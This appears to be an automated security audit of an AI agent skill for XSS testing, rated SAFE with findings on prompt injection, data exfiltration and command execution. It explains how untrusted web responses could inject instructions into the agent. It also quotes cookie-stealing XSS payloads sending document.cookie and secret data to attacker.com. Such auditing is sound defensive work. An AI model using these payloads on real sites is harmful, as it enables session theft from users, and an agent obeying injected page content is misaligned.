Skills
skills/wgpsec/aboutsecurity/xss-methodology/Gen Agent Trust Hub

xss-methodology

Pass

Audited by Gen Agent Trust Hub on May 15, 2026

Risk Level: SAFEPROMPT_INJECTIONDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection as it instructs the agent to ingest and analyze untrusted data from web responses.
  • Ingestion points: Target website responses (HTML body, headers) retrieved via the http_request tool as described in SKILL.md (Phase 0).
  • Boundary markers: Absent. The instructions do not specify delimiters or warnings to ignore embedded instructions in the processed data.
  • Capability inventory: The agent has access to http_request for network operations and python3 for script execution.
  • Sanitization: Absent. No validation or escaping of external content is mandated before the agent processes the data.
  • [DATA_EXFILTRATION]: The skill provides methodology and specific payloads for exfiltrating sensitive data, which is consistent with its role as a security testing tool.
  • Evidence: AGENT.md instructs the agent to "窃取 cookie 或读取页面内容" (steal cookies or read page content). references/xss-bypass-and-types.md contains payloads such as location='https://attacker.com/?c='+document.cookie and <link rel=prefetch href="http://attacker.com/?c=SECRET_DATA">.
  • [COMMAND_EXECUTION]: The skill facilitates the execution of local scripts and the hosting of servers to support testing operations.
  • Evidence: AGENT.md explicitly lists python3 as a preferred tool for encoding payloads and starting receiving servers.
Audit Metadata
Risk Level
SAFE
Analyzed
May 15, 2026, 01:38 PM